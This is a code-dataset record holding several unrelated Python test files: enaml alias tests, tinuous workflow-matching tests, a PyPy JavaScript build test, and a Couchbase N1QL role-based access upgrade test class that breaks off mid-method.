| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
73a95a549e48961227b72139c22f512710490c7b
| 16,747
|
py
|
Python
|
tests/test_alias.py
|
rogererens/enaml
|
06cd917dfa4f8b924e871a8c6360ce3ef2e45971
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
tests/test_alias.py
|
rogererens/enaml
|
06cd917dfa4f8b924e871a8c6360ce3ef2e45971
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
tests/test_alias.py
|
rogererens/enaml
|
06cd917dfa4f8b924e871a8c6360ce3ef2e45971
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
#------------------------------------------------------------------------------
# Copyright (c) 2013, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#------------------------------------------------------------------------------
from textwrap import dedent
import pytest
from utils import compile_source
#------------------------------------------------------------------------------
# Alias Syntax
#------------------------------------------------------------------------------
def test_syntax_1():
    """A bare `alias name` pointing at a named child block compiles."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Content(Container):
        alias pb
        PushButton: pb:
            name = 'button'
    enamldef Main(Window):
        Content:
            name = 'content'
    """)
    compile_source(source, 'Main')


def test_syntax_2():
    """`alias new_name: target` aliasing a child object compiles."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Content(Container):
        alias pc: pb
        PushButton: pb:
            name = 'button'
    enamldef Main(Window):
        Content:
            name = 'content'
    """)
    compile_source(source, 'Main')


def test_syntax_3():
    """`alias name: target.attr` aliasing a child attribute compiles."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Content(Container):
        alias pc: pb.text
        PushButton: pb:
            name = 'button'
    enamldef Main(Window):
        Content:
            name = 'content'
    """)
    compile_source(source, 'Main')
#------------------------------------------------------------------------------
# Bad Alias Syntax
#------------------------------------------------------------------------------
def test_bad_syntax_1():
    """A dotted bare alias (`alias pb.text`) is a syntax error."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Content(Container):
        alias pb.text
        PushButton: pb:
            text = 'spam'
    enamldef Main(Window):
        Content:
            name = 'content'
    """)
    with pytest.raises(SyntaxError):
        compile_source(source, 'Main')


def test_bad_syntax_2():
    """Two space-separated names after `alias` is a syntax error."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Content(Container):
        alias pb text
        PushButton: pb:
            text = 'spam'
    enamldef Main(Window):
        Content:
            name = 'content'
    """)
    with pytest.raises(SyntaxError):
        compile_source(source, 'Main')


def test_bad_syntax_3():
    """Trailing junk after the alias target is a syntax error."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Content(Container):
        alias pb: pb text
        PushButton: pb:
            text = 'spam'
    enamldef Main(Window):
        Content:
            name = 'content'
    """)
    with pytest.raises(SyntaxError):
        compile_source(source, 'Main')
#------------------------------------------------------------------------------
# Alias References
#------------------------------------------------------------------------------
def test_ref_1():
    """A bare alias resolves to the aliased child widget."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Content(Container):
        alias pb
        PushButton: pb:
            name = 'button'
    enamldef Main(Window):
        Content:
            name = 'content'
    """)
    main = compile_source(source, 'Main')()
    button = main.find('button')
    content = main.find('content')
    assert content.pb is button


def test_ref_2():
    """An explicit self-named alias (`alias pb: pb`) resolves to the widget."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Content(Container):
        alias pb: pb
        PushButton: pb:
            name = 'button'
    enamldef Main(Window):
        Content:
            name = 'content'
    """)
    main = compile_source(source, 'Main')()
    button = main.find('button')
    content = main.find('content')
    assert content.pb is button


def test_ref_3():
    """An alias under a different public name resolves to the widget."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Content(Container):
        alias foo: pb
        PushButton: pb:
            name = 'button'
    enamldef Main(Window):
        Content:
            name = 'content'
    """)
    main = compile_source(source, 'Main')()
    button = main.find('button')
    content = main.find('content')
    assert content.foo is button


def test_ref_4():
    """An attribute alias reads through to the child's attribute value."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Content(Container):
        alias pb: pb.text
        PushButton: pb:
            text = 'spam'
    enamldef Main(Window):
        Content:
            name = 'content'
    """)
    main = compile_source(source, 'Main')()
    content = main.find('content')
    assert content.pb == 'spam'


def test_ref_5():
    """Aliases chain across nested enamldefs to reach a grandchild widget."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Other(Container):
        alias slider
        Slider: slider:
            name = 'slider'
    enamldef Content(Container):
        alias other
        Other: other:
            pass
    enamldef Main(Window):
        Content:
            name = 'content'
    """)
    main = compile_source(source, 'Main')()
    slider = main.find('slider')
    content = main.find('content')
    assert content.other.slider is slider


def test_ref_6():
    """An attribute alias is readable through an object alias."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Other(Container):
        alias value: slider.value
    
        Slider: slider:
            value = 50
    enamldef Content(Container):
        alias other
        Other: other:
            pass
    enamldef Main(Window):
        Content:
            name = 'content'
    """)
    main = compile_source(source, 'Main')()
    content = main.find('content')
    assert content.other.value == 50


def test_ref_7():
    """An alias of an alias reads through both levels."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Other(Container):
        alias value: slider.value
        Slider: slider:
            value = 50
    enamldef Content(Container):
        alias value: other.value
        Other: other:
            pass
    enamldef Main(Window):
        Content:
            name = 'content'
    """)
    main = compile_source(source, 'Main')()
    content = main.find('content')
    assert content.value == 50


def test_ref_8():
    """A dotted alias target may traverse an object alias (other.slider.value)."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Other(Container):
        alias slider
        Slider: slider:
            value = 50
    enamldef Content(Container):
        alias value: other.slider.value
        Other: other:
            pass
    enamldef Main(Window):
        Content:
            name = 'content'
    """)
    main = compile_source(source, 'Main')()
    content = main.find('content')
    assert content.value == 50
#------------------------------------------------------------------------------
# Bad Alias Reference
#------------------------------------------------------------------------------
def test_bad_ref_1():
    """A bare alias naming a nonexistent block id fails with TypeError."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Content(Container):
        alias pc
        PushButton: pb:
            text = 'spam'
    enamldef Main(Window):
        Content:
            name = 'content'
    """)
    with pytest.raises(TypeError):
        compile_source(source, 'Main')


def test_bad_ref_2():
    """An alias targeting a nonexistent block id fails with TypeError."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Content(Container):
        alias pc: pd
        PushButton: pb:
            text = 'spam'
    enamldef Main(Window):
        Content:
            name = 'content'
    """)
    with pytest.raises(TypeError):
        compile_source(source, 'Main')


def test_bad_ref_3():
    """An alias targeting a nonexistent attribute ('tex') fails with TypeError."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Content(Container):
        alias pc: pb.tex
        PushButton: pb:
            text = 'spam'
    enamldef Main(Window):
        Content:
            name = 'content'
    """)
    with pytest.raises(TypeError):
        compile_source(source, 'Main')


def test_bad_ref_4():
    """An alias dotted past a plain attribute (text.spam) fails with TypeError."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Content(Container):
        alias pc: pb.text.spam
        PushButton: pb:
            text = 'spam'
    enamldef Main(Window):
        Content:
            name = 'content'
    """)
    with pytest.raises(TypeError):
        compile_source(source, 'Main')


def test_bar_ref_5():
    # NOTE(review): "bar" looks like a typo for "bad" — rename in a follow-up.
    """An alias to a nonexistent alias ('valued') on a child fails with TypeError."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Other(Container):
        alias value: slider.value
        Slider: slider:
            value = 50
    enamldef Content(Container):
        alias value: other.valued
        Other: other:
            pass
    enamldef Main(Window):
        Content:
            name = 'content'
    """)
    with pytest.raises(TypeError):
        compile_source(source, 'Main')


def test_bad_ref_6():
    """A chained alias ending in a nonexistent attribute fails with TypeError."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Other(Container):
        alias slider
        Slider: slider:
            value = 50
    enamldef Content(Container):
        alias value: other.slider.valsue
        Other: other:
            pass
    enamldef Main(Window):
        Content:
            name = 'content'
    """)
    with pytest.raises(TypeError):
        compile_source(source, 'Main')
#------------------------------------------------------------------------------
# Alias Binding
#------------------------------------------------------------------------------
def test_bind_1():
    """Binding to an attribute alias writes through to the child's attribute."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Content(Container):
        alias pb: pb.text
        PushButton: pb:
            name = 'button'
    enamldef Main(Window):
        Content:
            pb = 'foo'
    """)
    main = compile_source(source, 'Main')()
    button = main.find('button')
    assert button.text == 'foo'


def test_bind_2():
    """Binding to a chained alias writes through to the nested widget."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Other(Container):
        alias slider
        Slider: slider:
            name = 'slider'
    enamldef Content(Container):
        alias value: other.slider.value
        Other: other:
            pass
    enamldef Main(Window):
        Content:
            value = 50
    """)
    main = compile_source(source, 'Main')()
    slider = main.find('slider')
    assert slider.value == 50


def test_bind_3():
    """Binding to an alias-of-an-alias overrides the widget's default value."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Other(Container):
        alias value: slider.value
        Slider: slider:
            name = 'slider'
            value = 50
    enamldef Content(Container):
        alias value: other.value
        Other: other:
            pass
    enamldef Main(Window):
        Content:
            value = 42
    """)
    main = compile_source(source, 'Main')()
    slider = main.find('slider')
    assert slider.value == 42
#------------------------------------------------------------------------------
# Bad Alias Binding
#------------------------------------------------------------------------------
def test_bad_bind_1():
    """Binding a value directly to an object alias fails with TypeError."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Content(Container):
        alias pb
        PushButton: pb:
            name = 'button'
    enamldef Main(Window):
        Content:
            pb = 'foo'
    """)
    with pytest.raises(TypeError):
        compile_source(source, 'Main')


def test_bad_bind_2():
    """Binding to a misspelled alias name ('txt') fails with TypeError."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Content(Container):
        alias text: pb.text
        PushButton: pb:
            name = 'button'
    enamldef Main(Window):
        Content:
            txt = 'foo'
    """)
    with pytest.raises(TypeError):
        compile_source(source, 'Main')
#------------------------------------------------------------------------------
# Extended Alias Binding
#------------------------------------------------------------------------------
def test_ex_bind_1():
    """Extended binding (`alias.attr = value`) through an object alias works."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Content(Container):
        alias pb
        PushButton: pb:
            name = 'button'
    enamldef Main(Window):
        Content:
            pb.text = 'foo'
    """)
    main = compile_source(source, 'Main')()
    button = main.find('button')
    assert button.text == 'foo'


def test_ex_bind_2():
    """Extended binding through an alias that targets a nested widget works."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Other(Container):
        alias slider
        Slider: slider:
            name = 'slider'
    enamldef Content(Container):
        alias value: other.slider
        Other: other:
            pass
    enamldef Main(Window):
        Content:
            value.value = 50
    """)
    main = compile_source(source, 'Main')()
    slider = main.find('slider')
    assert slider.value == 50


def test_ex_bind_3():
    """Multi-level extended binding (alias.alias.attr = value) works."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Other(Container):
        alias slider
        Slider: slider:
            name = 'slider'
    enamldef Content(Container):
        alias value: other
        Other: other:
            pass
    enamldef Main(Window):
        Content:
            value.slider.value = 42
    """)
    main = compile_source(source, 'Main')()
    slider = main.find('slider')
    assert slider.value == 42
#------------------------------------------------------------------------------
# Bad Alias Binding
#------------------------------------------------------------------------------
def test_bad_ex_bind_1():
    """Extended binding on a misspelled alias root ('pbd') fails with TypeError."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Content(Container):
        alias pb
        PushButton: pb:
            name = 'button'
    enamldef Main(Window):
        Content:
            pbd.text = 'foo'
    """)
    with pytest.raises(TypeError):
        compile_source(source, 'Main')


def test_bad_ex_bind_2():
    """Extended binding to a nonexistent attribute ('txt') fails with TypeError."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Content(Container):
        alias pb
        PushButton: pb:
            name = 'button'
    enamldef Main(Window):
        Content:
            pb.txt = 'foo'
    """)
    with pytest.raises(TypeError):
        compile_source(source, 'Main')


def test_bad_ex_bind_3():
    """Extended binding to a bad attribute on an aliased widget fails."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Other(Container):
        alias slider
        Slider: slider:
            name = 'slider'
    enamldef Content(Container):
        alias value: other.slider
        Other: other:
            pass
    enamldef Main(Window):
        Content:
            value.val = 50
    """)
    with pytest.raises(TypeError):
        compile_source(source, 'Main')
#------------------------------------------------------------------------------
# Alias Ordering
#------------------------------------------------------------------------------
def test_ordering():
    """An alias may reference another alias declared earlier in the tree."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Content(Container):
        Field: field:
            alias this_text: field.text
        alias text: field.this_text
    enamldef Main(Window):
        Content:
            pass
    """)
    compile_source(source, 'Main')
#------------------------------------------------------------------------------
# Bad Alias Ordering
#------------------------------------------------------------------------------
def test_bar_ordering():
    # NOTE(review): "bar" looks like a typo for "bad" — rename in a follow-up.
    """An alias referencing an alias declared later fails with TypeError."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Content(Container):
        alias text: field.this_text
        Field: field:
            alias this_text: field.text
    enamldef Main(Window):
        Content:
            pass
    """)
    with pytest.raises(TypeError):
        compile_source(source, 'Main')
#------------------------------------------------------------------------------
# Bad Alias Override
#------------------------------------------------------------------------------
def test_bad_override_1():
    """An alias may not shadow an existing member ('background') — TypeError."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Content(Container):
        alias background
        Field: background:
            pass
    enamldef Main(Window):
        Content:
            pass
    """)
    with pytest.raises(TypeError):
        compile_source(source, 'Main')


def test_bad_override_2():
    """A subclass enamldef may not redefine an inherited alias — TypeError."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Content(Container):
        alias foo
        Field: foo:
            pass
    enamldef Content2(Content):
        alias foo: bar
        Field: bar:
            pass
    enamldef Main(Window):
        Content2:
            pass
    """)
    with pytest.raises(TypeError):
        compile_source(source, 'Main')


def test_bad_override_3():
    """An `attr` may not override an inherited alias — TypeError."""
    source = dedent("""\
    from enaml.widgets.api import *
    enamldef Content(Container):
        alias foo
        Field: foo:
            pass
    enamldef Content2(Content):
        attr foo
    enamldef Main(Window):
        Content2:
            pass
    """)
    with pytest.raises(TypeError):
        compile_source(source, 'Main')
| 21.693005
| 79
| 0.499612
| 1,554
| 16,747
| 5.297297
| 0.058559
| 0.078231
| 0.069971
| 0.091837
| 0.935739
| 0.925777
| 0.916059
| 0.902575
| 0.89723
| 0.887755
| 0
| 0.006541
| 0.287992
| 16,747
| 771
| 80
| 21.721141
| 0.683831
| 0.134054
| 0
| 0.867537
| 0
| 0
| 0.663048
| 0
| 0
| 0
| 0
| 0
| 0.026119
| 1
| 0.067164
| false
| 0.037313
| 0.072761
| 0
| 0.139925
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fb990033b20e432941ca32d17dd96d9d1f820e4a
| 1,888
|
py
|
Python
|
test/test_base.py
|
yarikoptic/tinuous
|
23bcccce77a0c118cd07f06ad1cc6ee1a4edb58e
|
[
"MIT"
] | null | null | null |
test/test_base.py
|
yarikoptic/tinuous
|
23bcccce77a0c118cd07f06ad1cc6ee1a4edb58e
|
[
"MIT"
] | null | null | null |
test/test_base.py
|
yarikoptic/tinuous
|
23bcccce77a0c118cd07f06ad1cc6ee1a4edb58e
|
[
"MIT"
] | null | null | null |
import pytest
from tinuous.base import WorkflowSpec
@pytest.mark.parametrize(
    "spec,path,r",
    [
        # Literal include matches the exact filename.
        (
            WorkflowSpec(include=["build.yaml"], exclude=[], regex=False),
            ".github/workflows/build.yaml",
            True,
        ),
        # Literal include does not match a different extension.
        (
            WorkflowSpec(include=["build.yaml"], exclude=[], regex=False),
            ".github/workflows/build.yml",
            False,
        ),
        # A regex-looking pattern is treated literally when regex=False.
        (
            WorkflowSpec(include=[r"^build-*\.ya?ml$"], exclude=[], regex=False),
            ".github/workflows/build-foo.yml",
            False,
        ),
        # With regex=True the same style of pattern matches .yml ...
        (
            WorkflowSpec(include=[r"^build-.*\.ya?ml$"], exclude=[], regex=True),
            ".github/workflows/build-foo.yml",
            True,
        ),
        # ... and .yaml.
        (
            WorkflowSpec(include=[r"^build-.*\.ya?ml$"], exclude=[], regex=True),
            ".github/workflows/build-foo.yaml",
            True,
        ),
        # Exclude pattern leaves non-excluded names included ...
        (
            WorkflowSpec(
                include=[r"^build-.*\.ya?ml$"],
                exclude=[r"^build-box\.yaml$"],
                regex=True,
            ),
            ".github/workflows/build-foo.yaml",
            True,
        ),
        # ... and rejects the excluded one.
        (
            WorkflowSpec(
                include=[r"^build-.*\.ya?ml$"],
                exclude=[r"^build-box\.yaml$"],
                regex=True,
            ),
            ".github/workflows/build-box.yaml",
            False,
        ),
        # Multiple include patterns: either one may match.
        (
            WorkflowSpec(include=["build.yaml", "test.yml"], exclude=[], regex=True),
            ".github/workflows/build.yaml",
            True,
        ),
        (
            WorkflowSpec(include=["build.yaml", "test.yml"], exclude=[], regex=True),
            ".github/workflows/test.yml",
            True,
        ),
    ],
)
def test_workflowspec_match(spec: WorkflowSpec, path: str, r: bool) -> None:
    """WorkflowSpec.match applies include/exclude (literal or regex) to the
    workflow file's path and returns exactly the expected boolean."""
    assert spec.match(path) is r
| 28.606061
| 85
| 0.457627
| 165
| 1,888
| 5.224242
| 0.2
| 0.198376
| 0.185615
| 0.167053
| 0.795824
| 0.788863
| 0.759861
| 0.759861
| 0.75522
| 0.730858
| 0
| 0
| 0.370763
| 1,888
| 65
| 86
| 29.046154
| 0.725589
| 0
| 0
| 0.645161
| 0
| 0
| 0.239407
| 0.141419
| 0
| 0
| 0
| 0
| 0.016129
| 1
| 0.016129
| false
| 0
| 0.032258
| 0
| 0.048387
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fbbacdd9e403395655013f562cb94f48b3ab115b
| 205
|
py
|
Python
|
pypy/translator/js/examples/djangoping/test/test_build.py
|
camillobruni/pygirl
|
ddbd442d53061d6ff4af831c1eab153bcc771b5a
|
[
"MIT"
] | 12
|
2016-01-06T07:10:28.000Z
|
2021-05-13T23:02:02.000Z
|
pypy/translator/js/examples/djangoping/test/test_build.py
|
camillobruni/pygirl
|
ddbd442d53061d6ff4af831c1eab153bcc771b5a
|
[
"MIT"
] | null | null | null |
pypy/translator/js/examples/djangoping/test/test_build.py
|
camillobruni/pygirl
|
ddbd442d53061d6ff4af831c1eab153bcc771b5a
|
[
"MIT"
] | 2
|
2016-07-29T07:09:50.000Z
|
2016-10-16T08:50:26.000Z
|
from pypy.translator.js.main import rpython2javascript
def test_build():
    """Smoke test: the djangoping client module translates to JavaScript.

    rpython2javascript returns a truthy result on successful translation of
    the 'ping_init' entry point.
    """
    # Local import keeps the heavy example module out of collection time.
    from pypy.translator.js.examples.djangoping import client
    assert rpython2javascript(client, ['ping_init'], use_pdb=False)
| 29.285714
| 67
| 0.790244
| 26
| 205
| 6.115385
| 0.730769
| 0.100629
| 0.226415
| 0.251572
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.01105
| 0.117073
| 205
| 6
| 68
| 34.166667
| 0.867403
| 0
| 0
| 0
| 0
| 0
| 0.044118
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
fbd56344777f0c659ca2d7f2d1665aecad8a0925
| 19,390
|
py
|
Python
|
pytests/tuqquery/upgrade_n1qlrbac.py
|
couchbaselabs/testrunner-bharath
|
96af90070da2140cc11c549db7403f5ea3b76d34
|
[
"Apache-2.0"
] | null | null | null |
pytests/tuqquery/upgrade_n1qlrbac.py
|
couchbaselabs/testrunner-bharath
|
96af90070da2140cc11c549db7403f5ea3b76d34
|
[
"Apache-2.0"
] | null | null | null |
pytests/tuqquery/upgrade_n1qlrbac.py
|
couchbaselabs/testrunner-bharath
|
96af90070da2140cc11c549db7403f5ea3b76d34
|
[
"Apache-2.0"
] | null | null | null |
import logging
from couchbase_helper.documentgenerator import BlobGenerator
from couchbase_helper.tuq_helper import N1QLHelper
from newupgradebasetest import NewUpgradeBaseTest
from pytests.tuqquery.n1ql_rbac_2 import RbacN1QL
from remote.remote_util import RemoteMachineShellConnection
log = logging.getLogger(__name__)
class UpgradeN1QLRBAC(RbacN1QL, NewUpgradeBaseTest):
    """Upgrade tests for N1QL RBAC.

    Verifies that users, role grants and secondary/primary indexes created
    before a Couchbase upgrade keep working after offline and online
    (rebalance / failover) upgrades, and that new users and permission
    changes behave correctly on the upgraded cluster.
    """
    def setUp(self):
        self.array_indexing = False
        super(UpgradeN1QLRBAC, self).setUp()
        self.initial_version = self.input.param('initial_version', '4.6.0-3653')
        self.upgrade_to = self.input.param("upgrade_to")
        # Helper used to run N1QL queries against the cluster under test.
        self.n1ql_helper = N1QLHelper(version=self.version, shell=self.shell,
                                      use_rest=self.use_rest, max_verify=self.max_verify,
                                      buckets=self.buckets, item_flag=self.item_flag,
                                      n1ql_port=self.n1ql_port, full_docs_list=[],
                                      log=self.log, input=self.input, master=self.master)
        self.n1ql_node = self.get_nodes_from_services_map(service_type="n1ql")
        log.info(self.n1ql_node)
        if self.ddocs_num:
            self.create_ddocs_and_views()
        # Seed every bucket with documents before the upgrade is performed.
        gen_load = BlobGenerator('pre-upgrade', 'preupgrade-', self.value_size, end=self.num_items)
        self._load_all_buckets(self.master, gen_load, "create", self.expire_time, flag=self.item_flag)
        self.query_standard_bucket = self.query_buckets[1]
    def tearDown(self):
        super(UpgradeN1QLRBAC, self).tearDown()
    def test_offline_upgrade_with_rbac(self):
        """
        1. This test is run with sasl bucket.Secondary and primary indexes are
        created before upgrade.
        2. After offline upgrade we make sure that queries can use these indexes for
        sasl and non sasl buckets.
        3. We also use pre-upgrade users for the query with indexes.
        """
        for query_bucket in self.query_buckets:
            self.query = 'create index idx on {0}(meta().id)'.format(query_bucket)
            self.run_cbq_query(query=self.query)
        # create users before upgrade via couchbase-cli
        self.create_users_before_upgrade_non_ldap()
        self._perform_offline_upgrade()
        # verify number of buckets after upgrade
        self.assertTrue(len(self.buckets) == 2)
        self.query = 'select * from system:user_info'
        actual_result = self.run_cbq_query(query=self.query)
        # verify number of users after upgrade
        self.log.error(actual_result['metrics']['resultCount'])
        self.assertEqual(actual_result['metrics']['resultCount'], 9)
        self.create_users(users=[{'id': 'john',
                                  'name': 'john',
                                  'password': 'password'}])
        self.query = "GRANT {0} to {1}".format("admin", 'john')
        actual_result = self.run_cbq_query(query=self.query)
        self.assertTrue(actual_result['status'] == 'success')
        self.query = 'select * from system:user_info'
        actual_result = self.run_cbq_query(query=self.query)
        self.log.error(actual_result['metrics']['resultCount'])
        self.assertTrue(actual_result['metrics']['resultCount'] == 10)
        self.create_users(users=[{'id': 'johnClusterAdmin',
                                  'name': 'john',
                                  'password': 'password'}])
        self.query = "GRANT {0} to {1}".format("cluster_admin", 'johnClusterAdmin')
        actual_result = self.run_cbq_query(query=self.query)
        self.assertTrue(actual_result['status'] == 'success')
        self.query = 'select * from system:user_info'
        actual_result = self.run_cbq_query(query=self.query)
        self.assertTrue(actual_result['metrics']['resultCount'] == 11)
        # Legacy-style user whose id equals the bucket name gets bucket_admin.
        self.query = "GRANT {0} on {2} to {1}".format("bucket_admin", self.query_standard_bucket, self.query_standard_bucket)
        actual_result = self.run_cbq_query(query=self.query)
        self.assertTrue(actual_result['status'] == 'success')
        self.shell = RemoteMachineShellConnection(self.master)
        for query_bucket in self.query_buckets:
            cmd = "{4} -u {0}:{1} http://{2}:8093/query/service -d 'statement=SELECT * from {3} use index(idx) where " \
                  "meta().id > 0 LIMIT 10'".format('johnClusterAdmin', 'password',
                                                   self.master.ip, query_bucket, self.curl_path)
            self.sleep(10)
            output, error = self.shell.execute_command(cmd)
            self.shell.log_command_output(output, error)
            self.assertTrue(any("success" in line for line in output), "Unable to select from {0} as user {1}".
                            format(query_bucket, 'johnClusterAdmin'))
            # use pre-upgrade users
            cmd = "{4} -u {0}:{1} http://{2}:8093/query/service -d 'statement=SELECT * from {3} use index(idx) where " \
                  "meta().id > 0 LIMIT 10'".format('john', 'password', self.master.ip, query_bucket, self.curl_path)
            output, error = self.shell.execute_command(cmd)
            self.shell.log_command_output(output, error)
            # Bug fix: failure message previously named 'john_admin', but the
            # request above authenticates as 'john'.
            self.assertTrue(any("success" in line for line in output), "Unable to select from {0} as user {1}".
                            format(query_bucket, 'john'))
            cmd = "{4} -u {0}:{1} http://{2}:8093/query/service -d 'statement=SELECT * from {3} use index(idx) where " \
                  "meta().id > 0 LIMIT 10'".format(self.query_standard_bucket, 'password', self.master.ip,
                                                   query_bucket, self.curl_path)
            output, error = self.shell.execute_command(cmd)
            self.shell.log_command_output(output, error)
            self.assertTrue(any("success" in line for line in output), "Unable to select from {0} as user {1}".
                            format(query_bucket, self.query_standard_bucket))
    def test_offline_upgrade_with_new_users(self):
        """
        1. This test creates different users with different query permissions
        and validates the specific permissions after upgrade.
        2. We use pre-upgrade users for different queries and then change
        permissions on them and verify various queries accordingly.
        3. We also change permissions on new users and verify queries accordingly.
        :return:
        """
        for query_bucket in self.query_buckets:
            self.query = 'create index idx on {0}(meta().id)'.format(query_bucket)
            self.run_cbq_query(query=self.query)
        # create users before upgrade via couchbase-cli
        self.create_users_before_upgrade_non_ldap()
        self._perform_offline_upgrade()
        self.sleep(20)
        # verify number of buckets after upgrade
        self.assertTrue(len(self.buckets) == 2)
        self.query_select_insert_update_delete_helper()
        self.query = 'select * from system:user_info'
        actual_result = self.run_cbq_query(query=self.query)
        self.assertTrue(actual_result['metrics']['resultCount'] == 16)
        self.check_permissions_helper()
        self.create_users(users=[{'id': 'johnClusterAdmin',
                                  'name': 'john',
                                  'password': 'password'}])
        self.query = "GRANT {0} to {1}".format("cluster_admin", 'johnClusterAdmin')
        actual_result = self.run_cbq_query(query=self.query)
        self.assertTrue(actual_result['status'] == 'success')
        cmd = "{4} -u {0}:{1} http://{2}:8093/query/service -d 'statement=SELECT * from {3} use index(idx) where meta().id > 0 " \
              "LIMIT 10'". \
            format('johnClusterAdmin', 'password', self.master.ip, self.query_standard_bucket, self.curl_path)
        output, error = self.shell.execute_command(cmd)
        self.shell.log_command_output(output, error)
        self.assertTrue(any("success" in line for line in output), "Unable to select from {0} as user {1}".
                        format(self.query_standard_bucket, 'johnClusterAdmin'))
        cmd = "{3} -u {0}:{1} http://{2}:8093/query/service -d 'statement=SELECT * from system:my_user_info'".format(
            'johnClusterAdmin', 'password', self.master.ip, self.curl_path)
        output, error = self.shell.execute_command(cmd)
        self.shell.log_command_output(output, error)
        self.assertTrue(any("success" in line for line in output), "Unable to select from {0} as user {1}".
                        format('my_user_info', 'johnClusterAdmin'))
        self.use_pre_upgrade_users_post_upgrade()
        self.change_permissions_and_verify_pre_upgrade_users()
        self.change_permissions_and_verify_new_users()
    def test_offline_upgrade_with_system_catalog(self):
        """
        1. This test does offline upgrade and checks various system catalog users
        2. It might fail based on implementation details from dev.
        :return:
        """
        for query_bucket in self.query_buckets:
            self.query = 'create index idx on {0}(meta().id)'.format(query_bucket)
            self.run_cbq_query(query=self.query)
        self._perform_offline_upgrade()
        self.create_and_verify_system_catalog_users_helper()
        self.check_system_catalog_helper()
    def test_offline_upgrade_check_ldap_users_before_upgrade(self):
        """
        This test does offline upgrade and tests if users created before upgrade are working correctly after upgrade.
        The users created before upgrade are verified for functionality in verify_pre_upgrade_users_permissions_helper.
        Permissions for the users created before upgrade are changed after upgrade to new query based permissions in
        change_pre_upgrade_users_permissions.
        """
        for query_bucket in self.query_buckets:
            self.query = 'create index idx on {0}(meta().id)'.format(query_bucket)
            self.run_cbq_query(query=self.query)
        self._perform_offline_upgrade()
        self.sleep(20)
        self.query = 'select * from system:user_info'
        actual_result = self.n1ql_helper.run_cbq_query(query=self.query, server=self.n1ql_node)
        self.assertTrue(actual_result['metrics']['resultCount'] == 5)
        self.verify_pre_upgrade_users_permissions_helper()
        self.change_and_verify_pre_upgrade_ldap_users_permissions()
        self.query_select_insert_update_delete_helper()
        self.query = 'select * from system:user_info'
        actual_result = self.run_cbq_query(query=self.query)
        self.assertTrue(actual_result['metrics']['resultCount'] == 12)
        self.check_permissions_helper()
        self.change_permissions_and_verify_new_users()
    def test_online_upgrade_with_rebalance_with_rbac(self):
        """
        # This test does the online upgrade ,validates the specific
        # permissions after upgrade and verifies the number of users created are correct.
        # It also verifies the queries use the correct index for sasl buckets after online upgrade.
        """
        for query_bucket in self.query_buckets:
            self.query = 'create index idx on {0}(meta().id)'.format(query_bucket)
            self.run_cbq_query(query=self.query)
        # create users before upgrade via couchbase-cli
        self.create_users_before_upgrade_non_ldap()
        self._perform_online_upgrade_with_rebalance()
        self.sleep(20)
        # verify number of buckets after upgrade
        self.assertTrue(len(self.buckets) == 1)
        self.query = 'select * from system:user_info'
        actual_result = self.run_cbq_query(query=self.query)
